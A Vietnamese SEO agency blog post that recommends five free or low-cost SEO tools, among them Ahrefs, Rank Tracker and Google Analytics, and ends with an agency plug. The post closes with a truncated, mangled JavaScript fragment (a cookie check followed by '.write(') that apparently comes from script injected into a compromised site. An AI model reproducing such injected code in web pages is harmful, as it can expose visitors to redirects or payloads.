Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > 5 Công cụ SEO phổ biến hữu hiệu nhất ( Miễn phí)

5 Công cụ SEO phổ biến hữu hiệu nhất ( Miễn phí)

Người ta thường nói người công nhân làm việc tốt hay không là nhờ vào công cụ của họ. Điều này càng đúng hơn cho những người làm lĩnh vực SEO. Vì SEO tự nhiên, bao gồm cả những công cụ và phần mềm chủ yếu cho các nhiệm vụ cụ thể. Kể cả việc kiểm tra thứ hạng hằng ngày cho các từ khóa hay đo lường lượng Traffic mỗi tuần, những công cụ này là xương sống cho sự thành công của chiến dịch Marketing trực tuyến. Vì thế, kể cả bạn làm việc cho đại lý SEO gia đình hay là công ty lớn thì việc biết sử dụng những công cụ SEO chung là cơ bản.

 Công ty seo

Khi lần đầu tiên tôi tham gia vào lĩnh vực SEO, đã rất nhanh chóng nhận ra những công cụ này đắt giá như thế nào?

Hy vọng mục này sẽ chỉ cho bạn cách dùng các công cụ một cách chuyên nghiệp nhất. Dưới đây là danh sách 5 công cụ SEO và là vũ khí của bạn để có thể thực hiện thành công chiến lược SEO

Ahrefs.com: 1 trong những công cụ phân tích backlink tốt nhất trên thị trường

Công cụ này có thể được sử dụng như một site riêng hoặc để phân tích hồ sơ backlink của đối thủ cạnh tranh. Những thông tin được cung cấp bởi công cụ này hoàn toàn đáng để chú ý. Nó cung cấp nhiều dữ liệu hơn chỉ với một click.

Bản dùng thử là quá đủ để phân tích 1 hoặc 2 Website cơ bản một ngày. Khối lượng dữ liệu đã cung cấp trong phiên bản free tất nhiên cũng đầy đủ cho từ những người bắt đầu làm SEO, người đã biết làm SEO hay các chuyên gia về SEO.

Các SEOER chuyên nghiệp sẽ cần đăng ký mua dài hạn theo tháng, chỉ khoảng 79$/ tháng. Quả là đáng đồng tiền bát gạo.

Rank Tracker: Một phần không thể thiếu của chiến lược SEO, Rank Tracker là một trong những công cụ đo lường chính xác nhất thứ hạng của Website. Công cụ này cung cấp cực kỳ chính xác thứ hạng của Website cùng với các từ khóa được chọn. Nó cũng cho phép bạn theo dõi thứ hạng từ khóa ở nhiều nước khác nhau với công cụ tìm kiếm đặc thù như Google.co.uk hay Google.ca.

Phiên bản Free của Rank Tracker sẽ cung cấp đầy đủ các dữ liệu cần thiết cho bạn. Chỉ có một nhược ddiemr là những dữ liệu này không thể xuất ra file PDF với phiên bản này. Để tạo ra các bản báo cáo cho bạn hoặc khách hàng, bạn cần phải trả tiền đăng ký theo từng tháng. Với những người mới bắt đầu, công cụ này thích hợp với với việc phân tích thứ hạng của các từ khóa.

Google Analytics: Một trong những công cụ mạnh nhất của SEO do chính Google cung cấp.

Với Google Analytics, một là bạn có thể phân tích traffic của Website một cách tổng quan và sâu sắc. Những thông tin này bao gồm liên quan đến việc thông kê lượng visitor, thời gian ở lại trên site, tỷ lệ tăng trưởng và nhiều hơn nữa.

Google Webmaster Tools: Một công cụ đầy sức mạnh khác của Google, GWT giúp phân tích sâu bản thân Website đó. Khi Google Analytics tập trung vào visitor, GWT lại tập trung vào site và backlink. Điều này cho phép các nhà quản trị Web phân tích được các phân mục trên Website và các URL cần thiết.

Một lần nữa, giống như các sản phẩm của Google, công cụ này thường nên update để cải thiện các tính năng. Gần đây, Google đã thêm công cụ  Disavow Links  giúp bạn loại bỏ những bad link vào site.

Advanced Google Queries: một công cụ không thể thiếu, advanced Google queries giúp các chuyên gia SEO tìm ra những nguồn công nghiệp đặc biệt giống như forum… Tương tự nhưng việc tìm kiếm thông thường nhưng có các tính chất đặc biệt và chuyên sâu hơn. Ví dụ, nếu một người đang tìm kiếm bài đăng nào đó về một lĩnh vực đặc biệt, bạn sẽ phải gõ các từ tìm kiếm + người post bài. Điều này có nghĩa tìm ra được page mà từ khóa có kết nối với người post bài.

Dịch vụ SEO Pridio

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘